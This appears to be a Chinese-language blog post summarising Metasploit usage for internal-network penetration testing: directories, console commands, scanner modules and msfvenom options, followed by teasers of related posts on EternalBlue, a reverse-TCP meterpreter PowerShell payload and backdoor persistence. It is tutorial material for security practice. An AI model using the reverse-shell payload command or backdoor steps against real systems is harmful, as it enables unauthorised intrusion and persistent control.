內網滲透之msf工具詳解

2021-10-09 01:37:16 字數 913 閱讀 6240

一.檔案目錄

date目錄 儲存資料

documentation目錄 文件目錄

lib目錄 儲存ruby指令碼

modules目錄 儲存模組和外掛程式

tools目錄 儲存小工具

二.基礎使用

msfdb init 初始化並啟動資料庫

db_status 檢視資料庫狀態

msfconsole 控制台 (可以使用kage實現介面化)

help 幫助

exit 退出

show 進行羅列模板

search 搜尋模組名或cve編號

back 返回上一級

info 檢視模組具體資訊

show options 檢視需要配置的

set 進行設定屬性

exploit/run 進行執行

jobs 檢視後台執行的工作

kill +id號 停止job

三.收集資訊

auxiliary/scanner/discovery/arp_sweep arp掃瞄

auxiliary/scanner/discovery/udp_sweep udp掃瞄

auxiliary/scanner/portscan/tcp 埠掃瞄

還有許多的其他型別的掃瞄就不再多說了

四.msfvenom

msfvenom -l 檢視型別

msfvenom -l payloads 檢視所有payload

msfvenom -l archs 檢視所有架構

msfvenom -l format 檢視所有格式

msfvenom -p 指定payload格式

msfvenom -f 指定輸出格式

msfvenom -e 指定編碼方式

msfvenom -i 指定編碼次數 (注意要小於20)

內網滲透(msf 永恆之藍漏洞)

準備工具 一台kall虛擬機器 擁有msf 一台win7虛擬機器 先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。在掃瞄出有著永恆之藍漏洞的計算機後,...

msf反彈shell內網滲透

1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...

內網滲透 許可權維持 MSF

msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...